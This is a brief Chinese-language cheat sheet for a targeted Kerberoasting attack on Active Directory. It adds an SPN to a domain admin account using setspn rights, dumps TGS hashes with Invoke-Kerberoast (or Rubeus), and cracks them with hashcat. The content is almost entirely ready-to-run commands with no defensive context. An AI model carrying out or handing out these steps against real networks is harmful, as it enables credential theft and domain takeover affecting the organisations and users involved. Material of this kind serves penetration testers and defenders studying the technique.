当有setspn权限时，为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin

域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast

>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt

或使用rubeus.exe

破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt